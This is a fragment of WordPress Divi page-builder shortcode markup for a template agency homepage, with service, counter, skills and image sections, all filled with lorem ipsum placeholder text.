_builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" 